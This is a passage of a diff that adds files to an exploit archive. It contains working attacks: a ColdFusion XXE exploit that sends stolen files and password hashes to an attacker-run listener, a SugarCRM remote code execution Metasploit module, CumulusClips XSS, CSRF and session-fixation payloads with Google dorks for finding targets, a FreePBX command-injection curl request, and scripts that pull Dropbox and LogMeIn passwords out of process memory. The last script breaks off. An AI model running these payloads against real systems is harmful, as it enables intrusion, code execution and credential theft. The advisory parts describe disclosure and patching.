visible way: +https://www.google.com/?q=inurl:%2Findex.cfm +including various government websites: +https://www.google.com/search?q=inurl:index.cfm+site:gov + + +III. INTRODUCTION +------------------------- + +An independent research revealed that Adobe ColdFusion in versions 11 and below +is vulnerable to XXE Injection when processing untrusted office documents. + +Depending on web application's functionality and the attacker's ability to +supply a malicious document to be processed by a vulnerable ColdFusion +application, this vulnerability may potentially be exploited by both +low-privileged and unauthenticated remote attackers. + +This vulnerability can allow various attacks including: + +- reading arbitrary files (stored on the server and within the network shares) +- listing web/system directories +- SSRF attacks / unauthorized access to restricted services running on the localhost + as well as within the victim's server network +- SMB relay attacks +- temporary file uploads which may be used by attackers in combination with LFI + vulnerabilities to supply malicious code + +This advisory provides a PoC exploit that demonstrates how a remote attacker +could read arbitrary files from the target server, as well as list directories. + +Ability to read arbitrary files could for example let attackers extract sensitive +information such as ColdFusion password hashes of the management console or stored +database credentials. +This could allow unauthorized access to weakly protected ColdFusion management +interfaces and let attackers upload malicious code which could be used to fully +compromise the server. + + +IV. DESCRIPTION +------------------------- + +The XXE vulnerability was found in the Office Open XML (OOXML) processing +functions which are utilised when opening documents that use XML structure. +Documents that are commonly stored in this format include: + +- DOCX (Word documents) +- XLSX (Excel spreadsheets) +- PPTX (PowerPoint presentations) + +More information about the format can be found in: +https://en.wikipedia.org/wiki/Office_Open_XML + +The vulnerability is caused by an unrestricted XML parser which allows +for external XML entities processing when parsing such document. + +Many web applications often accept OOXML documents from their users to process +documents of various purposes, for example: + +- invoices +- bank statements +- bills +- tax forms +- inventory +- CVs / cover letters +- application forms + +etc. + +Such upload functionality is often exposed to low-privileged or even +unauthenticated remote users. + +If an attacker is able to upload a specially crafted OOXML document +which is later processed by an application written in Adobe ColdFusion, +they may be able to perform various malicious actions including +arbitrary file reading and directory listing as mentioned in the +introduction. + +This could for example be used by malicious users to read sensitive +ColdFusion config files such as: + +- neo-security.xml , which stores ColdFusion admin's password hash salt +- password.properties , which stores admin's password hash +- neo-datasource.xml , which stores database credentials + +that are stored in c:\ColdFusion11\cfusion\lib\ directory by default on Windows +installations. + +Attackers might also access the application sourcecodes within the documentroot: + +c:\ColdFusion11\cfusion\wwwroot + +or access other sensitive system files available within the system. + +As the vulnerability also allows browsing the filesystem and its directories, +attackers may easily find interesting files and ColdFusion config/webroot +directories even if the paths differ from the default ones. + +Attackers who have gained access to password hashes could then proceed +to cracking them in order to gain unauthorised access to the databases and +ColdFusion administrator panels to fully compromise the target. + +More information on hashes used by ColdFusion 11 can be found in the references +below. + +The next section presents a PoC exploit that can be used for file/directory +retrieval. +The exploit will work even if the target ColdFusion application does not return +any data back to the attacker upon processing a malicious document file. +The extracted data will be sent over the network back to the attacker as soon +as the document file is processed. + + +V. PROOF OF CONCEPT EXPLOIT +------------------------- + +An example vulnerable ColdFusion application written in CFML language +which loads a spreadsheet document could look as follows: + + +---[ vulnerable.cfm ]--- + + + +#xlsdoc# + +------------------------ + + +For simplicity, this ColdFusion application will load cf_poc_exploit.xlsx +document from the current directory. +In a real-world situation the application would allow a user to upload a +document from their disk or alternatively fetch it from a URL. + +Attacker could use the exploit below to prepare a malicious document and +supply it to a vulnerable ColdFusion application. + + +---[ ./cf_xxe_exploit.py ]--- +''' + +#!/usr/bin/python + +intro = """ +(CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit + +This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be +uploaded to a vulnerable ColdFusion application. +It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080) +in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet). + +Discovered/Coded by: + + Dawid Golunski + http://legalhackers.com +""" +usage = """ +Usage: +The exploit requires that you have an external IP and can start web/http listeners on ports +8080/9090 on the attacking machine. + +./cf_xxe_exploit.py external_IP 'path_to_fetch' + +The example below starts an ftp listener on 192.168.1.40 (port 9090) and web server on 8080 +and fetches c:\windows\win.ini file from the target. + +./cf_xxe_exploit.py 192.168.1.40 c:/windows/win.ini + +The path can also be a directory to retrieve a directory listing e.g: + +./cf_xxe_exploit.py 192.168.1.40 c:/ + +will list the contents of drive C: on Windows + +Disclaimer: +For testing purposes only. Do no harm. + +Full advisory URL: +http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt +""" + +import socket +import subprocess +import sys +import web # http://webpy.org/installation +import threading +import time + +# What file to retrieve from the victim server +target_file = "c:/ColdFusion11/cfusion/lib/pass" +# Web server (to serve XML) +external_ip = '192.168.57.10' +web_port = 8080 +# File receiver +ftp_port = 9090 +timeout=5 + +# HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection +class webserver(threading.Thread): + def run (self): + urls = ('/passdata.xml', 'pass_xml') + app = web.application(urls, globals()) + #app.run() + return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', web_port)) + +# Pass data to ftp server using passdata.xml +class pass_xml: + def GET(self): + print xxe_send_payload + +# HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection +class webserver(threading.Thread): + def run (self): + urls = ('/passdata.xml', 'pass_xml') + app = web.application(urls, globals()) + #app.run() + return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', web_port)) + +# Return helper xml/xxe payload to forward data +class pass_xml: + def GET(self): + print "[+] Received GET /passdata.xml web request from the victim (%s) ! TARGET VULNERABLE to XXE !\n" % (web.ctx['ip']) + return xxe_send_payload + +def shutdown(code): + print "[+] That's it folks :) Shutting down \n" + web.httpserver.server.interrupt = KeyboardInterrupt() + exit(code) + + +# [ Main Meat ] + +print intro +redirector_started = 0 + +if len(sys.argv) < 3 : + print usage + sys.exit(2) + +# Overwrite settings with parameters from argv[] +external_ip = sys.argv[1] +target_file = sys.argv[2] + +print "[+] Setting external IP to '%s' and target path to '%s'\n" % (external_ip, target_file) + +# Prepare XXE payloads +#OOXML XXE stub +ooxml_xxe_payload = """ + + %remote; +]> +""" +ooxml_xxe_payload = ooxml_xxe_payload.replace("_attackerhost_", external_ip) +ooxml_xxe_payload = ooxml_xxe_payload.replace("_webport_", str(web_port)) + +# passdata.xml +xxe_send_payload = """ +' > +%param1; +%retrfile1; """ +xxe_send_payload = xxe_send_payload.replace("_filepath_", target_file) +xxe_send_payload = xxe_send_payload.replace("_attackerhost_", external_ip) +xxe_send_payload = xxe_send_payload.replace("_ftpport_", str(ftp_port)) + +# Create OXML spreadsheet file cf_poc_spreadsheet.xlsx with XXE payload +f = open("[Content_Types].xml", "w") +f.write(ooxml_xxe_payload ) +f.close() +cmd = "zip -r cf_poc_spreadsheet.xlsx '[Content_Types].xml' && rm -f '[Content_Types].xml'" +process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) +(result, error) = process.communicate() +rc = process.wait() +if rc != 0: + print "Error: failed to execute command:", cmd + print error + shutdown(3) + +print "[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file\n" +print "[+] Starting our web server to serve XML on %s:%s \n" % (external_ip, web_port) +webserver().start() +time.sleep(1) + +print '\n[+] Starting FTP/data listener and waiting for connection on %s:%d\n' % (external_ip, ftp_port) +s = socket.socket() # Create/bind socket +s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) +s.bind((external_ip, ftp_port)) + +print "[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now...\n" + +s.listen(5) # Wait for the victim to connect +c, addr = s.accept() # Establish connection with the victim +print '\n[+] Got a connection from ', addr, " to our FTP/data server. Meaning juicy data is on the way! :)\n" +c.send("220 Welcome to ColdFusion XXE PoC exploit server\n") + +print '[+] Receiving data from the victim...\n' + +downloaded = "" + +while True: + data = "" + c.settimeout(timeout) + try: + data = c.recv(1024) + except socket.timeout: + print "Timeout ! No more data\n" + break + + # extract data + if data.startswith("CWD "): + downloaded = downloaded + data[4:] + if data.startswith("RETR "): + downloaded = downloaded + data[5:] + + print "Received packet: " + data + #sys.stdout.write('.') + #sys.stdout.flush() + + if "USER" in data: + c.send("331 password needed\n") + elif "RETR" in data: + c.send("550 No such file or directory.\n") + break + else: + c.send('230 continue\n') + +# Results +print "\n\n[+] Here's the retrieved contents of the target file/directory (%s) : \n\n%s\n" % (target_file, downloaded) + +# shutdown +c.close() # Close the connection +s.shutdown(0) +s.close() +shutdown(0) + +''' +-------------[eof]----------- + + +You can see the exploit in action in a PoC video at: + +http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit + +There are also two examples below: + + +A) Reading c:/ColdFusion11/cfusion/lib/neo-security.xml file which contains admin hash salt: + + +root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/cfusion/lib/neo-security.xml + +(CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit + +This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be +uploaded to a vulnerable ColdFusion application. +It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080) +in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet). + +Discovered/Coded by: + + Dawid Golunski + http://legalhackers.com + +[+] Setting external IP to '192.168.57.10' and target path to 'c:/ColdFusion11/cfusion/lib/neo-security.xml' + +[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file + +[+] Starting our web server to serve XML on 192.168.57.10:8080 + +http://0.0.0.0:8080/ + +[+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090 + +[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now... + +[+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE ! + +192.168.57.21:57219 - - [31/Aug/2016 20:12:06] "HTTP/1.1 GET /passdata.xml" - 200 OK + +[+] Got a connection from ('192.168.57.21', 57220) to our FTP/data server. Meaning juicy data is on the way! :) + +[+] Receiving data from the victim... + +Received packet: USER cfhack +Received packet: PASS PoCexploit +Received packet: TYPE I +Received packet: CWD
< +var>A54B28011C6AC37F4D65B7D608D40722DAD6CDF25A943C809492637D2CC6265F< +string>< +var>false< +[cut] + + +[+] That's it folks :) Shutting down + + +~~~~~~~~~~~~ + + +B) Listing the contents of the c:/ColdFusion11/ directory: + + +root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/ + +[cut] +[+] Setting external IP to '192.168.57.10' and target path to 'c:/ColdFusion11/' + +[+] Successfully created PoC spreadsheet with XXE payload in 'cf_poc_spreadsheet.xlsx' file + +[+] Starting our web server to serve XML on 192.168.57.10:8080 + +http://0.0.0.0:8080/ + +[+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090 + +[*] Upload the 'cf_poc_spreadsheet.xlsx' spreadsheet document to the target ColdFusion app now... + +[+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE ! + +192.168.57.21:57245 - - [31/Aug/2016 20:14:06] "HTTP/1.1 GET /passdata.xml" - 200 OK + +[+] Got a connection from ('192.168.57.21', 57246) to our FTP/data server. Meaning juicy data is on the way! :) + +[+] Receiving data from the victim... + +Received packet: USER cfhack + +Received packet: RETR Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log +cf_app.ico + +[cut] + +[+] Here's the retrieved contents of the target file/directory (c:/ColdFusion11/) : + +Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log +cf_app.ico +cfusion +config +jre +license.html +Readme.htm +uninstall + + +[+] That's it folks :) Shutting down + + + +VI. BUSINESS IMPACT +------------------------- + +The vulnerability can be abused by low-privileged or unauthenticated remote +attackers depending on application's functionality and lead to sensitive +information disclosure. It can allow attackers to read arbitrary files or +expose internal services running on the server and within the local network. + +Attackers could for example read stored password hashes or database credentials +which may aid attackers with gaining access to ColdFusion admin interface. +Extracting application sourcecodes could also be of use to attackers and help +them to find other vulnerabilities to fully compromise an affected target. + + +VII. SYSTEMS AFFECTED +------------------------- + +ColdFusion installations before: + +- ColdFusion 11 Update 10 +- ColdFusion 10 Update 21 + +are affected by this vulnerability. + + +VIII. SOLUTION +------------------------- + +Update to ColdFusion 11 Update 10 which include critical hotfixes released by +the vendor upon initial private disclosure to Adobe. Alternatively users can +upgrade their installation to ColdFusion 2016 which is not affected. + +The vulnerability fix/advisory has been assigned APSB16-30 id by Adobe. + +Links to the critical Adobe hotfix patches can be found in the references below. + + +IX. REFERENCES +------------------------- + +http://legalhackers.com +http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt +http://legalhackers.com/exploits/cf_xxe_exploit_CVE-2016-4264.py + +PoC exploit video: +http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit + +https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4264 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4264 + +Adobe ColdFusion critical hotfix/vuln announcement: +https://helpx.adobe.com/security/products/coldfusion/apsb16-30.html + +Info on ColdFusion configs and used hashes: +http://www.openwall.com/lists/john-users/2015/06/07/1 +https://helpx.adobe.com/coldfusion/kb/purpose-location-xml-configuration-files.html +https://blogs.adobe.com/psirt/?p=1395 + +http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers + +Lockdown guides: +http://www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf11/cf11-lockdown-guide.pdf + + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski + +dawid (at) legalhackers (dot) com +http://legalhackers.com + +XI. REVISION HISTORY +------------------------- + +31.08.2016 - advisory released +01.09.2016 - corrections applied +07.09.2016 - added PoC video + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. +''' \ No newline at end of file diff --git a/platforms/php/remote/40344.rb b/platforms/php/remote/40344.rb new file mode 100755 index 000000000..314c345ea --- /dev/null +++ b/platforms/php/remote/40344.rb @@ -0,0 +1,89 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SugarCRM REST Unserialize PHP Code Execution', + 'Description' => %q{ + This module exploits a PHP Object Injection vulnerability in SugarCRM CE <= 6.5.23 + which could be abused to allow unauthenticated users to execute arbitrary PHP code with + the permissions of the webserver. The dangerous unserialize() call exists in the + '/service/core/REST/SugarRestSerialize.php' script. The exploit abuses the __destruct() + method from the SugarCacheFile class to write arbitrary PHP code into the /custom directory. + }, + 'Author' => 'EgiX', + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'http://karmainsecurity.com/KIS-2016-07'], + ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-001'], + ['URL', 'http://www.sugarcrm.com/security/sugarcrm-sa-2016-008'], + ['URL', 'https://bugs.php.net/bug.php?id=72663'] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => [ ['SugarCRM CE <= 6.5.23', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 23 2016' + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]) + ], self.class) + end + + def exploit + upload_php = '/custom/' + rand_text_alpha(rand(4)+8) + '.php' + + payload_serialized = "O:+14:\"SugarCacheFile\":23:{S:17:\"\\00*\\00_cacheFileName\";" + payload_serialized << "s:#{upload_php.length+2}:\"..#{upload_php}\";S:16:\"\\00*\\00" + payload_serialized << "_cacheChanged\";b:1;S:14:\"\\00*\\00_localStore\";a:1:{i:0;s:55" + payload_serialized << ":\"\";}}" + + print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, 'service/v4/rest.php'), + 'method' => 'POST', + 'vars_post' => { + 'method' => 'login', + 'input_type' => 'Serialize', + 'rest_data' => payload_serialized + } + }) + + if not res or res.code != 200 + print_error("#{peer} - Exploit failed: #{res.code}") + return + end + + register_files_for_cleanup(File.basename(upload_php)) + + print_status("#{peer} - Executing the payload #{upload_php}") + + res = send_request_cgi( + { + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, upload_php), + 'headers' => { 'payload' => Rex::Text.encode_base64(payload.encoded) } + }) + + if res and res.code != 200 + print_error("#{peer} - Payload execution failed: #{res.code}") + return + end + end +end diff --git a/platforms/php/webapps/40343.txt b/platforms/php/webapps/40343.txt new file mode 100755 index 000000000..f43a08539 --- /dev/null +++ b/platforms/php/webapps/40343.txt @@ -0,0 +1,156 @@ +# Exploit Title: CumulusClips Session fixation +# Google Dork: inurl:/cumulusclips/videos/ +# Date: 2.09.2016 +# Exploit Author: kor3k / Łukasz Korczyk +# Vendor Homepage: http://cumulusclips.org/ +# Software Link: http://cumulusclips.org/cumulusclips.zip +# Version: 2.4.1 +# Tested on: Debian Jessie + + +Description: +CumulusClips is a video sharing script that allows you to start your own +video website. +CumulusClips video sharing script produces HTML5 video compatible on iOS & +Android mobile devices, as well as all the major browsers. + + +PoC: + +POST /cumulusclips/account/videos/edit/1362/ HTTP/1.1 +Host: 192.168.122.203 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1362/ +Cookie: PHPSESSID=bqaok1gfcs0s7hqfc40g2bsbr1 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 211 + +title=evilcartoon%3Cscript%3Edocument.cookie%3D%27PHPSESSID% +3Dxxxxxxxxxxxxxxxxxxxxxxxxxx%3Bpath%3D%2F%3B%27%3C% +2Fscript%3E&tags=aaa&cat_id=1&description=aaa&private_url= +BOZtzZX&submitted=TRUE&button=Update+Video + +Remediation: +Change session id after sucessful login + +Post exploitation: +Since it is posible to impersonate admin there is possibility for a code +execution and unrestricted file upload in admin panel. + +####################################################### + +# Exploit Title: CumulusClips XSRF and code execution +# Google Dork: inurl:/cumulusclips/videos/ +# Date: 2.09.2016 +# Exploit Author: kor3k / Łukasz Korczyk +# Vendor Homepage: http://cumulusclips.org/ +# Software Link: http://cumulusclips.org/cumulusclips.zip +# Version: 2.4.1 +# Tested on: Debian Jessie +# CVE : [if applicable] + +Description: +CumulusClips is a video sharing script that allows you to start your own video website. +CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers. + + +PoC: + + +
+ + + + + + + + + + + +
+ + + + +Remediation: +Use anti-csrf token, fix all XSS'es + +####################################################### + + +# Exploit Title: CumulusClips Persistent XSS +# Google Dork: inurl:/cumulusclips/videos/ +# Date: 2.09.2016 +# Exploit Author: kor3k / Łukasz Korczyk +# Vendor Homepage: http://cumulusclips.org/ +# Software Link: http://cumulusclips.org/cumulusclips.zip +# Version: 2.4.1 +# Tested on: Debian Jessie +# CVE : [if applicable] + +Description: +CumulusClips is a video sharing script that allows you to start your own video website. +CumulusClips video sharing script produces HTML5 video compatible on iOS & Android mobile devices, as well as all the major browsers. + +Any registered user may inject a code to main site. There is no HTTPonly flag on cookies so it is possible to steal session information. + +PoC: + +locations: +/cumulusclips/account/videos/edit/ +/cumulusclips/account/upload/video/ + + + + +POST /cumulusclips/account/videos/edit/1358/ HTTP/1.1 +Host: 192.168.122.203 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Referer: http://192.168.122.203/cumulusclips/account/videos/edit/1358/ +Cookie: PHPSESSID=etia0ncfb00m0ma1834cf1dds5 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 215 + +title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&tags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cat_id=1&description=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&button=Update+Video + +reflected on main site: + +GET /cumulusclips/ HTTP/1.1 +Host: 192.168.122.203 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +DNT: 1 +Referer: http://192.168.122.203/ +Connection: close + +RESPONSE: +... +div class="video"> +
+ + +... + + +Post exploitation: +Since it is posible to steal the cookie and impersonate admin there is possibility for a code execution and unrestricted file upload in admin panel. + +Remediation: +Validate user input for special characters (preferable white list), use HTTPonly header \ No newline at end of file diff --git a/platforms/php/webapps/40345.txt b/platforms/php/webapps/40345.txt new file mode 100755 index 000000000..379bc0efd --- /dev/null +++ b/platforms/php/webapps/40345.txt @@ -0,0 +1,122 @@ +Vulnerable software : Freepbx +Tested versions : 13.0.x < 13.0.154 +vendor : freepbx.org +Author : i-Hmx +Email : n0p1337@gmail.com +Home : sec4ever.com + +Knock knock people , Eg-R1z on the mic again . . +Freepbx is vulnerable to unauthenticated remote command execution due to multiple weak inputs validation as well as partial authenticaion bypass +Need more technical shit?! +Here u go + +File : /var/www/html/admin/libraries/Composer/vendor/symfony/process/Symfony/Component/Process/Process.php +class Process +{ + const ERR = 'err'; + const OUT = 'out'; + + const STATUS_READY = 'ready'; + const STATUS_STARTED = 'started'; + const STATUS_TERMINATED = 'terminated'; + +Line 145: + public function __construct($commandline, $cwd = null, array $env = null, $input = null, $timeout = 60, array $options = array()) + { + if (!function_exists('proc_open')) { + throw new RuntimeException('The Process class relies on proc_open, which is not available on your PHP installation.'); + } + + --===>>> $this->commandline = $commandline; + $this->cwd = $cwd; + + +Line 275 + $commandline = $this->commandline; + + if ('\\' === DIRECTORY_SEPARATOR && $this->enhanceWindowsCompatibility) { + $commandline = 'cmd /V:ON /E:ON /C "('.$commandline.')'; + foreach ($this->processPipes->getFiles() as $offset => $filename) { + $commandline .= ' '.$offset.'>'.ProcessUtils::escapeArgument($filename); + } + $commandline .= '"'; + + if (!isset($this->options['bypass_shell'])) { + $this->options['bypass_shell'] = true; + } + } + + --===>>> $this->process = proc_open($commandline, $descriptors, $this->processPipes->pipes, $this->cwd, $this->env, $this->options); + +Class is being called at + +File : /var/www/html/admin/libraries/media/Media/Driver/Drivers/SoxShell.php +Line 118 + public function convert($newFilename,$extension,$mime) { + switch($extension) { + case "wav": + switch($this->extension) { + case "sln": + $process = new Process($this->binary.' -t raw -s -b 16 -r 8000 '.$this->track.' -r '.$this->options['samplerate'].' -b '.$this->options['bitdepth'].' -c 1 '.$newFilename); + break; + case "sln12": + $process = new Proces................. + case "wav16": + ---===>> $process = new Process($this->binary.' '.$this->track.' -t wav -b 16 -r 16000 -c 1 '.$newFilename); + break; + default: + $process = new Process($this->binary.' '.$this->track.' -c 1 '.$newFilename); + break; + } + if(!$this->background) { + ---===>> $process->run(); + if (!$process->isSuccessful()) { + throw new \RuntimeException($process->getErrorOutput()); + } + } else { + $process->start(); + if (!$process->isRunning()) { + throw new \RuntimeException($process->getErrorOutput()); + } + } + } + +Sox shell can be called via multiple parts of the fpbx including the music module +File : admin/modules/music/Music.class.php +Line : 407 + $name = $dname . '.' . $extension; + move_uploaded_file($tmp_name, $this->tmp."/".$name); + $media->load($this->tmp."/".$name); + foreach($_POST['codec'] as $c) { + --==>> $media->convert($path."/".$dname.".".$c); + } + unlink($this->tmp."/".$name); + +this part can be accessed by unauthenticated user and so it's obvious command execution vulnerable :/ + +POC : +[root:/lab/fpbx]# curl -i -s -k -X 'POST' \ + -H 'User-Agent: sec4ever 1337s' -H 'Referer: http://x.x.x.x/admin/ajax.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------317092200613369' \ + --data-binary $'-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"extension\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"language\"\x0d\x0a\x0d\x0aen\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"filename\"\x0d\x0a\x0d\x0afa.wav\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"codec[1]\"\x0d\x0a\x0d\x0agsm\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"id\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition: form-data; name=\"files[1]\"; filename=\"$(id).wav\"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0aEg-R1z ruling you ;)\x0d\x0a-----------------------------317092200613369\x0d\x0a\x0d\x0a' \ + 'http://x.x.x.x/admin/ajax.php?module=music&command=upload' +HTTP/1.1 500 Internal Server Error +Date: Wed, 07 Sep 2016 17:33:02 GMT +Server: Apache/2.2.15 (CentOS) +X-Powered-By: PHP/5.3.28 +Set-Cookie: lang=en_US +Set-Cookie: PHPSESSID=6j9ei3pn1btu2o6jc1j6mngmp4; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +X-Ignore-This: 1 +Connection: close +Transfer-Encoding: chunked +Content-Type: application/json + +{"error":{"type":"RuntimeException","message":"\/usr\/bin\/sox formats: can't open input file `groups=498(asterisk).wav': No such file or directory\n","file":"\/var\/www\/html\/admin\/libraries\/media\/Media\/Driver\/Drivers\/SoxShell.php","line":194}}# + +Patching : can be done via adding escapeshellarg to soxshell inputs +Almost fixed in fpbx later versions +# in this version spaces,',`,/,\,<,>,?,&,| are filtered , which can be super easily bypassed +# make a priv8 , burn another ;) +# From Eg-R1z with Love xD \ No newline at end of file diff --git a/platforms/windows/local/40341.txt b/platforms/windows/local/40341.txt new file mode 100755 index 000000000..7ee6c15d2 --- /dev/null +++ b/platforms/windows/local/40341.txt @@ -0,0 +1,242 @@ +##### +# Dropbox Desktop Client v9.4.49 (64bit) Local Credentials Disclosure +# Tested on Windows Windows Server 2012 R2 64bit, English +# Vendor Homepage @ https://www.dropbox.com +# Date 06/09/2016 +# Bug Discovery by: +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +##### +# Dropbox Desktop Client v9.4.49 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. +# A potential attacker could reveal the supplied username and password in order to gain access to account. +##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +username = '' +password = '' +found = 0 +filename = "Dropbox.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D'): + memory_dump.append(process.read(address,100)) + for i in range(len(memory_dump)): + email_addr = memory_dump[i].split('email=')[1] + tmp_passwd = memory_dump[i].split('password=')[1] + username = email_addr.split('\x00')[0] + password = tmp_passwd.split('&is_sso_link=')[0] + if username != '' and password !='': + found = 1 + print "[+] Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % urllib.unquote_plus(username) + print "[+] Password: %s" % password + if found == 0: + print "[-] Credentials not found! Make sure the client is connected." + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() + + + +###################################################################### + +##### +# LogMeIn Client v1.3.2462 (64bit) Local Credentials Disclosure +# Tested on Windows Windows Server 2012 R2 64bit, English +# Vendor Homepage @ https://secure.logmein.com/home/en +# Date 06/09/2016 +# Bug Discovery by: +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +##### +# LogMeIn Client v1.3.2462 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process. +# A potential attacker could reveal the supplied username and password in order to gain access to account and associated computers. +##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +username = '' +password = '' +found = 0 +filename = "LMIIgnition.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x26\x5F\x5F\x56\x49\x45\x57\x53\x54\x41\x54\x45\x3D'): + memory_dump.append(process.read(address,150)) + for i in range(len(memory_dump[0])): + email_addr = memory_dump[i].split('email=')[1] + tmp_passwd = 